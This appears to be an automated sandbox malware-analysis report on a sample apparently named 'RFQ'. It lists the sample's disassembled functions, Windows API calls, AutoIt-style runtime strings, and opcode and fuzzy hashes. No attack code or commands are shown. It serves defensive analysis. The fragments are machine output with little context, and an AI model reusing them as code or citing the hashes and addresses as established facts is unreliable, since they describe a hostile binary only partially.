                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$BuffCharLower
                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                            • API String ID: 707087890-567219261
                                                                            • Opcode ID: 3d19c941261f3d5c5d3c9d82421cc584eab45a8085d9665f1b876ae738af6b49
                                                                            • Instruction ID: ed9104d9c81a6ea75f8a15e4b7b833dae2624d58050d8d3f215b4478dcdd53c6
                                                                            • Opcode Fuzzy Hash: 3d19c941261f3d5c5d3c9d82421cc584eab45a8085d9665f1b876ae738af6b49
                                                                            • Instruction Fuzzy Hash: 1751A031A01116DBCB54DFA8C8508BEB7F6AF69320B204369E8A6D72C5DF39DD40C7A1
                                                                            Function 00703653 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoInitialize.OLE32 ref: 0070369B
                                                                            • CoUninitialize.OLE32 ref: 007036A6
                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,0071FB94,?), ref: 00703700
                                                                            • IIDFromString.OLE32(?,?), ref: 00703773
                                                                            • VariantInit.OLEAUT32(?), ref: 0070380B
                                                                            • VariantClear.OLEAUT32(?), ref: 0070385D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                            • API String ID: 636576611-1287834457
                                                                            • Opcode ID: fdba087230767b84d9c9ab700a61016ce1dde0d7f0664b22b98221587c6962b4
                                                                            • Instruction ID: 600b9bc7818de626b3f4ee9c11c694c16dc9fbbc3a2d4ad5b6c0b16e41eecb4c
                                                                            • Opcode Fuzzy Hash: fdba087230767b84d9c9ab700a61016ce1dde0d7f0664b22b98221587c6962b4
                                                                            • Instruction Fuzzy Hash: FD61AFB0608301EFD311DF58C889B6ABBE9AF45710F004A5DF9859B2D1D778EE44CB96
                                                                            Function 006E4543 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 160COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen
                                                                            • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                            • API String ID: 176396367-1994484594
                                                                            • Opcode ID: cda5c333390744281b81c7571df59934db4c023d711d2c69f81b8aa5580b28ad
                                                                            • Instruction ID: 29b4278804914f51433e379c81c6a03dd5dae53fe1c9359272f38aa66a5d706d
                                                                            • Opcode Fuzzy Hash: cda5c333390744281b81c7571df59934db4c023d711d2c69f81b8aa5580b28ad
                                                                            • Instruction Fuzzy Hash: 8A512322B063A28B8B249E7BC9C40BB73D3BF95710B60453CE48197745FF20DD4587A0
                                                                            Function 006F32A6 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadStringW.USER32(00000066,?,00000FFF), ref: 006F32ED
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                            • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 006F330E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: LoadString$_wcslen
                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                            • API String ID: 4099089115-3080491070
                                                                            • Opcode ID: ae24ea320ac7002d6a96b71706ff7755285582d98a2ab3aa54e384760c2e69fe
                                                                            • Instruction ID: 99f0243ad71cee21c332ec1748a1400eeeae4f96f299eb7d334bba74adf944bb
                                                                            • Opcode Fuzzy Hash: ae24ea320ac7002d6a96b71706ff7755285582d98a2ab3aa54e384760c2e69fe
                                                                            • Instruction Fuzzy Hash: 0E51C072900219AACF11FBE0CD52EEEB77AAF14300F104169F505721A1EBB96F49CF69
                                                                            Function 006EB4E6 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$BuffCharUpper
                                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                            • API String ID: 1256254125-769500911
                                                                            • Opcode ID: ebcbd49e005e3a5b965654d2b2850ce39dae71ebcd567e29e31907515a6f677b
                                                                            • Instruction ID: c53a6c29b234bf1e071cfd4ac9c228862b2d0767b0e2c2bd9e16a4714500f26c
                                                                            • Opcode Fuzzy Hash: ebcbd49e005e3a5b965654d2b2850ce39dae71ebcd567e29e31907515a6f677b
                                                                            • Instruction Fuzzy Hash: AA41F532A023678ACB106F7E88905FFB7A7BF61764B245229E465D7384EB35CD81C790
                                                                            Function 006F52B1 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 006F52BE
                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 006F5334
                                                                            • GetLastError.KERNEL32 ref: 006F533E
                                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 006F53C5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                            • API String ID: 4194297153-14809454
                                                                            • Opcode ID: d2b6590a3ec50e9dc73bad1d4368df6776f772b5a1ca564d41223ee6cd3194be
                                                                            • Instruction ID: 8940764b367086f596303d30fa3d0cc543d6adf260349e816fcbb08a9fe0d70c
                                                                            • Opcode Fuzzy Hash: d2b6590a3ec50e9dc73bad1d4368df6776f772b5a1ca564d41223ee6cd3194be
                                                                            • Instruction Fuzzy Hash: 0D319236A046089FC711DF6CC884AB9BBB6FB05344F148069E606DB392E7B5DD42CB91
                                                                            Function 00713B79 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateMenu.USER32 ref: 00713BAC
                                                                            • SetMenu.USER32(?,00000000), ref: 00713BBB
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00713C43
                                                                            • IsMenu.USER32(?), ref: 00713C57
                                                                            • CreatePopupMenu.USER32 ref: 00713C61
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00713C8E
                                                                            • DrawMenuBar.USER32 ref: 00713C96
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                            • String ID: 0$F
                                                                            • API String ID: 161812096-3044882817
                                                                            • Opcode ID: c3bd48f9abcbfe68f4a8f25525ea44974e952d92244e62359dfd55a0cd17b7db
                                                                            • Instruction ID: 34eefedbcc635a9398d64d5377c55f5ad98e2dc25936cf6d1c810ea11298e80f
                                                                            • Opcode Fuzzy Hash: c3bd48f9abcbfe68f4a8f25525ea44974e952d92244e62359dfd55a0cd17b7db
                                                                            • Instruction Fuzzy Hash: 0E416EB4601205AFDB14DFA8D854EEA7BB5FF89310F144429F915A7390D734AA50CF64
                                                                            Function 00713956 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007139D0
                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007139D3
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 007139FA
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00713A1D
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00713A95
                                                                            • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00713ADF
                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00713AFA
                                                                            • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00713B15
                                                                            • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00713B29
                                                                            • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00713B46
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$LongWindow
                                                                            • String ID:
                                                                            • API String ID: 312131281-0
                                                                            • Opcode ID: 42a461a8239706b6a23548dd59ab763c9206fcbdfcd70e8f7e8c2377f1fe3734
                                                                            • Instruction ID: 8399ce31b65bc37fff89dea1aed8190906885e65c1c3c45033a68c4738677087
                                                                            • Opcode Fuzzy Hash: 42a461a8239706b6a23548dd59ab763c9206fcbdfcd70e8f7e8c2377f1fe3734
                                                                            • Instruction Fuzzy Hash: 2A617CB1900248AFDB20DFA8CC81EEE77B8EF09710F104199FA15A72D1D778AE81CB54
                                                                            Function 006EB04D Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 006EB06F
                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,006EA0FF,?,00000001), ref: 006EB083
                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 006EB08A
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006EA0FF,?,00000001), ref: 006EB099
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 006EB0AB
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006EA0FF,?,00000001), ref: 006EB0C4
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006EA0FF,?,00000001), ref: 006EB0D6
                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,006EA0FF,?,00000001), ref: 006EB11B
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,006EA0FF,?,00000001), ref: 006EB130
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,006EA0FF,?,00000001), ref: 006EB13B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                            • String ID:
                                                                            • API String ID: 2156557900-0
                                                                            • Opcode ID: 27e7db7f3797a5c45b66722eb7295c9abff7b160b504c6e406a3e2ca5171fb61
                                                                            • Instruction ID: 9f1ef1e0399cc499b3a7a41676cb51620f4a95e06ae03021ed2ce737542b1229
                                                                            • Opcode Fuzzy Hash: 27e7db7f3797a5c45b66722eb7295c9abff7b160b504c6e406a3e2ca5171fb61
                                                                            • Instruction Fuzzy Hash: FC31D071501344BFDB159F69EC59BEB77BAEB05362F11D008F901D62D0E7B8AC428B68
                                                                            Function 006B2C10 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _free.LIBCMT ref: 006B2C24
                                                                              • Part of subcall function 006B2958: RtlFreeHeap.NTDLL(00000000,00000000,?,006BD771,00000000,00000000,00000000,00000000,?,006BD798,00000000,00000007,00000000,?,006BDB95,00000000), ref: 006B296E
                                                                              • Part of subcall function 006B2958: GetLastError.KERNEL32(00000000,?,006BD771,00000000,00000000,00000000,00000000,?,006BD798,00000000,00000007,00000000,?,006BDB95,00000000,00000000), ref: 006B2980
                                                                            • _free.LIBCMT ref: 006B2C30
                                                                            • _free.LIBCMT ref: 006B2C3B
                                                                            • _free.LIBCMT ref: 006B2C46
                                                                            • _free.LIBCMT ref: 006B2C51
                                                                            • _free.LIBCMT ref: 006B2C5C
                                                                            • _free.LIBCMT ref: 006B2C67
                                                                            • _free.LIBCMT ref: 006B2C72
                                                                            • _free.LIBCMT ref: 006B2C7D
                                                                            • _free.LIBCMT ref: 006B2C8B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: 7408ac64affc599a166a134a4e7143061432ae11db226ea053b80cfe654a9756
                                                                            • Instruction ID: 37712164990f59b455a98ccc6b03f2b973bc2e5d91f47178bd7584c6fd3776a3
                                                                            • Opcode Fuzzy Hash: 7408ac64affc599a166a134a4e7143061432ae11db226ea053b80cfe654a9756
                                                                            • Instruction Fuzzy Hash: 3A11D7B620024ABFCB41FF55C862CDD3BA6FF09351F4144A8BA5C5B222DA31DAD19B44
                                                                            Function 00682D1B Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00682D64
                                                                            • OleUninitialize.OLE32(?,00000000), ref: 00682E03
                                                                            • UnregisterHotKey.USER32(?), ref: 00682FE8
                                                                            • DestroyWindow.USER32(?), ref: 006C3045
                                                                            • FreeLibrary.KERNEL32(?), ref: 006C30AA
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 006C30D7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                            • String ID: close all
                                                                            • API String ID: 469580280-3243417748
                                                                            • Opcode ID: b66561a1034367605d91d0e6c34070f25b52592d10aaa4ad7183c41260fc83cf
                                                                            • Instruction ID: e93f3a82cff11ca547bd027ff01332dacc35b92ccded841797c78e5fb0e0a223
                                                                            • Opcode Fuzzy Hash: b66561a1034367605d91d0e6c34070f25b52592d10aaa4ad7183c41260fc83cf
                                                                            • Instruction Fuzzy Hash: CBD148317012228FCB19EF55C4A9B69F7A6FF05700F1482ADE54AAB351CB31AE16CF49
                                                                            Function 006F10A5 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 254COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SafeArrayGetVartype.OLEAUT32(?,?), ref: 006F117A
                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 006F11A2
                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 006F11C6
                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 006F11F6
                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 006F127D
                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 006F12E2
                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 006F134E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                            • String ID: %Jp
                                                                            • API String ID: 2550207440-2606009258
                                                                            • Opcode ID: f1f6bc4fb1f81cd25ea59dc6848718f1acb361b62b1845573c20ec8053a8dda3
                                                                            • Instruction ID: ac96338bef4907d2c3d7b9b8a2c833d09e040faf502415dcfda7191d7e73928b
                                                                            • Opcode Fuzzy Hash: f1f6bc4fb1f81cd25ea59dc6848718f1acb361b62b1845573c20ec8053a8dda3
                                                                            • Instruction Fuzzy Hash: FD91CF76A00219DFDB41DF98C885BFEB7BAFF06351F108029EA00EB291D775A941CB94
                                                                            Function 0068758A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 0068761A
                                                                              • Part of subcall function 006876AA: GetClientRect.USER32(?,?), ref: 006876D0
                                                                              • Part of subcall function 006876AA: GetWindowRect.USER32(?,?), ref: 00687711
                                                                              • Part of subcall function 006876AA: ScreenToClient.USER32(?,?), ref: 00687739
                                                                            • GetDC.USER32 ref: 006C52A2
                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 006C52B5
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 006C52C3
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 006C52D8
                                                                            • ReleaseDC.USER32(?,00000000), ref: 006C52E0
                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 006C5371
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                            • String ID: U
                                                                            • API String ID: 4009187628-3372436214
                                                                            • Opcode ID: 4ef80044c70d2bd944a669dc169914605fe50b59b774917ddc86dedb2ed9f83c
                                                                            • Instruction ID: 181b7653b15553ebaacf3c4d243528f53e556272a8dd2f49b80e79a2632ce4b8
                                                                            • Opcode Fuzzy Hash: 4ef80044c70d2bd944a669dc169914605fe50b59b774917ddc86dedb2ed9f83c
                                                                            • Instruction Fuzzy Hash: E071FF30400644DFCF229F64CC84FFA3BB6FF09351F284269E95A5A2A6E775E881DB50
                                                                            Function 006E4419 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 160COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen
                                                                            • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                            • API String ID: 176396367-1994484594
                                                                            • Opcode ID: 3e0118d27459ced3c97e250e613c58e50f1c199250668aa489efd0309272da0c
                                                                            • Instruction ID: 312315018d0fb82a8c33d448f4035cf58b37e2f0a52d1dcc6b4e8f4e1e474788
                                                                            • Opcode Fuzzy Hash: 3e0118d27459ced3c97e250e613c58e50f1c199250668aa489efd0309272da0c
                                                                            • Instruction Fuzzy Hash: 4B51E432B063A28BCB14DE7BC9945BA73E3BF95714B50062DE58197784EF20DE09C7A1
                                                                            Function 006E469F Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 158COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006E3F58: CharUpperBuffW.USER32(?,?,00000000,0071D0D0,?,?,00000001,?,?,006E4286,?,?,?,?,00000000,0071D0D0), ref: 006E3FE5
                                                                            • _wcslen.LIBCMT ref: 006E4296
                                                                            • _wcslen.LIBCMT ref: 006E42F0
                                                                            • _wcslen.LIBCMT ref: 006E4337
                                                                            • _wcslen.LIBCMT ref: 006E437B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$BuffCharUpper
                                                                            • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                            • API String ID: 1256254125-1994484594
